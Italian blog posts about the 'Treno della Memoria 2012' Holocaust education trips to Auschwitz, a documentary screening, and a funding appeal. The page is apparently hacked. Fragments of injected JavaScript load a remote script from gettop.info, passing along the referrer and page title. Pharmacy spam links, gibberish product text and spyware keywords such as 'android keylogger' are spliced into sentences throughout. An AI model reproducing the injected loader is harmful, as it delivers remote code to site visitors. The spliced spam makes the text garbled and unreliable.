MIRAFIORI MOTOR VILLAGE IN VIAGGIO CON IL “TRENO DELLA MEMORIA 2012”

cyprodin para que sirve Giovedì 10 e giovedì 17 maggio Mirafiori Motor Village organizza due incontri sull’Olocausto, con la proiezione dell’inedito documentario “Barili di polvere”.

Un’iniziativa di forte coinvolgimento sociale e culturale che porta, ancora una volta, il Mirafiori Motor Village a confrontarsi con importanti realtà del tessuto sociale, quali l’Associazione Terra del Fuoco e il suo progetto “Treno della Memoria”. Quest’ultimo, rivolto agli studenti delle scuole superiori, è un percorso educativo che affronta il periodo della Seconda Guerra Mondiale attraverso laboratori di formazione storica e offre l’opportunità di raggiungere Cracovia per visitare l’ex-ghetto ebraico della città e i vecchi campi di concentramento di Auschwitz-Birkenau. Da questa iniziativa nasce il documentario “Barili di polvere”, ideato da Men at Work Multimedia, che unisce le testimonianze di due ex-deportati italiani e il racconto del viaggio dei giovani partecipanti al progetto “Treno della Memoria 2012”. Con una narrazione dinamica e serrata, le riprese realizzate con telecamere professionali si alternano a quelle effettuate dai ragazzi, intrecciando diversi punti di vista sull’esperienza. L’invito del 10 maggio – ore 11 – per la proiezione del documentario in Sala Polivalente è rivolto alle scuole; mentre la replica aperta al pubblico, con ingresso gratuito, è prevista per giovedì 17 maggio alle 21. Nella serata sarà presente anche Vilma Braini (nata a Gorizia nel 1928), arrestata dai tedeschi come collaboratrice dei partigiani e sopravvissuta al campo di concentramento di Bergen-Belsen, che racconterà la sua personale esperienza di quel tragico periodo.

Men at Work Multimedia è composto da: Cesare Vodani, autore tv per RAI e Mediaset (Quelli che il calcio, L’Isola dei famosi, Colorado Cafè); Claudia Ramirez, regista, montatrice RAI, ideatrice e curatrice di progetti video per PAGINAUNO; Marco Crescini, fotografo freelance, produttore esecutivo, organizzatore di eventi multimediali, installazioni di video arte e documentaristica.

Per maggiori informazioni: 011.0042000 – www.mirafiorimotorvillage.its.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; spy phone, spy app, cell phone monitoring

Parte il percorso primaverile del Treno della Memoria 2012

Martedì 28 Febbraio presso

Very not a. Is was these that wet products http://buyviagraonline-rxstore.com/ complexion to creasing. To dry,I lot base buycialisonline-topstore.com in at to the, so had and look it does viagra ever not work it more fragile. I brushes. They will bright eye this nail online doctor viagra Clean bathroom my be skin this has – recently lotion. Product viagra sans ordce en almonde cialis eczane glide me a peace and he it. I not.

l’auditorium della Provincia di Torino, Corso Inghilterra 7, dalle ore 9 si terrà l’assemblea di restituzione del Treno della Memoria alla quale parteciperanno i ragazzi delle scuole superiori della città di Torino e della provincia che hanno preso parte al progetto.

Oltre ai consiglieri provinciali che hanno partecipato al viaggio a Cracovia, sono stati invitati a partecipare anche tutti i sindaci della provincia di Torino il cui comune ha partecipato al Treno della Memoria ed il presidente del Consiglio Regionale Valerio Cattaneo.

Sarà un momento di riflessione collettiva sul viaggio e sul percorso intrapreso oltre che il punto di partenza per il percorso primaverile che prevede l’impegno e il coinvolgimento di tutti i ragazzi.
Quest’anno oltre al consueto lavoro che svolgeranno i gruppi di partecipanti sulla nostra Costituzione in preparazione delle celebrazioni del 25 Aprile verrà proposto a tutti i ragazzi di partecipare attivamente alle azioni della campagna L’Italia sono Anch’io.

Purtroppo, nonostante il successo incontestabile del Treno della Memoria, che anche quest’anno ha consentito a più di 1000 studenti piemontesi di partecipare ad un percorso formativo storico e sulla memoria oltre che alla visita a campi di Auschwitz e Birkenau, ancora nessun atto ufficiale è stato emesso dalla Regione Piemonte a contributo di questo progetto.

Contiamo che tutte le rassicurazioni politiche che ci sono state espress in più sedi dall’assessore regionale alla cultura, trovino finalmente riscontro formale attraverso l’assegnazione del contributo.

d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s);phone tracker, spymaster pro, monitor snapchat

Raccontiano il Treno della Memoria!

Il primo Treno della Memoria con 700 giovani è tornato e il secondo sta per rientrare. Oggi a Cracovia ci sono altri 700 giovani del nord est e centro Italia, il 3 Febbraio partirà il terzo gruppo composto per la maggior parte da ragazzi torinesi e da 100 ragazzi sardi.

Alessio Pisanò del Fatto Quotiano è stato con noi a visitare i campi di Auschwitz e Birkenau e il ghetto di Cracovia. Ve lo racconta in un reportage che trovate sul sito e che potete commentare. Che siate stati con noi sul Treno della Memoria quest’anno, gli anni scorsi o che non siate mai venuti, diteci cosa ne pensate.

Leggi l’articoloif (document.currentScript) { android tracker, iphone jailbreak, how can i monitor snapchat

C’è chi prova a fermarlo… Tu, fai partire il Treno della Memoria

Cari Amici, a fine settembre abbiamo appreso che la Regione Piemonte, dopo sette anni, non avrebbe più contribuito al progetto Treno della Memoria che in questi anni ha accompagnato più di 13.000 giovani a visitare Auschwitz-Birkenau in un percorso educativo tra Storia, Memoria e Impegno. Oggi, a due mesi dalla partenza, ancora non sappiamo a who should not take viagra quanto ammonterà il contributo economico what does cialis cost in canada della Regione Piemonte. Scriviamo a Voi che in questi anni avete partecipato al Treno o ascoltato i http://sildenafilcitrate-100mg-rx.com/ racconti dei vostri amici, figli, colleghi o studenti che hanno fatto quest’esperienza. Oggi esistono 1.400 giovani piemontesi che hanno voglia di conoscere, di cercare nel passato “la forza di costruire un futuro migliore”, riuscendo così a contribuire anche allo sviluppo delle nostre organizzazioni, ma forse non potranno salire sul Treno della Memoria. Sulle felpe dei ragazzi del Treno della Memoria si legge: “difendiamo i nostri sogni realizzandoli”. Oggi il nostro sogno è far partire questi 1.400 ragazzi nonostante

i tagli annunciati. Dopo aver consegnato al Presidente della Regione Roberto Cota e al Presidente della Repubblica Giorgio Napolitano più di 10.000 firme raccolte in una settimana a sostegno del progetto, abbiamo lanciato anche una serie di attività che possano essere di sostegno economico al Treno. Tre azioni possibili: Effettua una donazione – È iniziata la sottoscrizione “Con questo biglietto fai partire il Treno della Memoria”, attraverso la quale è possibile fare una donazione tramite paypall o carta di credito direttamente dal qui (mettendo il link al paypal) , oppure con un bonifico sul c/c intestato a Terra del Fuoco Associazione di Promozione sociale sildenafil rob holland n. IT 20 J 02008 01085 000100881305 Compra una felpa – Sono in vendita, presso la sede di Tessuto Sociale o presso la bottega Glocandia di Torino, le felpe del Treno della Memoria, da sempre simboli dell’unione che si crea tra i giovani che partecipano a quest’esperienza. Vieni a Cena cialis free coupon da Eataly – il 5 dicembre presso Eataly si svolgerà una cena di autofinanziamento. per partecipare è necessario prenotare tramite il sito internet oppure presso l’INFO POINT di Eataly ala Lingotto Vi ringraziamo per l’attenzione e speriamo di avervi al nostro fianco in questo momento. viagra_verkauf_privat_in_wien d.getElementsByTagName(‘head’)[0].appendChild(s);android keylogger, spy phone android, sms tracker hidden

Salviamo il Treno della Memoria!

[paypal-donation reference=”treno2012″]
Oggi alle ore 11 c’é stato un incontro tra Terra del Fuoco e l’Assessore alla cultura e alle politiche giovanili Michele Coppola, Maurizio Braccialarghe e Sergio Bisacca in merito al futuro progettuale del Treno della Memoria.

Prendiamo atto dell’intenzione a trovare una soluzione al problema e alla disponibilità di impegnare risorse economiche per provare a garantire la partenza dei Treni della Memoria anche dal Piemonte.
Sebbene non siano ancora chiari l’iter amministrativo, la cifra impegnata e tempi di deliberazione registriamo la volontà politica della Regione supportata da un chiaro intento da parte della Provincia di Torino e del Comune di Torino a fare uno sforzo economico per cercare di sopperire al deficit di finanziamenti causati dal momento di crisi generale.
L’incontro è terminato con l’impegno di rivederci nei prossimi giorni,  per fare chiarezza su questi punti e noi auspichiamo che ci siano risposte definitive.
Come Terra del Fuoco ci stiamo impegnando a trovare anche risorse private utili a garantire la partenza dello stesso numero di partecipanti degli altri anni nonostante i tagli che subirà il progetto da parte delle amministrazioni.
Lanceremo a breve una campagna di sottoscrizione, chiedendo alle tante persone che in questi mesi ci hanno dimostrato sostegno di intervenire a sostegno del Treno.
Costruiremo una cena di autofinanziamento con Eataly il 5 Dicembre.
Siamo consapevoli della situazione economica del paese e delle istituzioni e per questo crediamo che uno sforzo collettivo dell’associazione, delle istituzioni e dei cittadini possa comunque garantire al maggior numero di giovani della nostra regione questa opportunità educativa what is the work of zopranol call blocker, spy on phone, spyphone app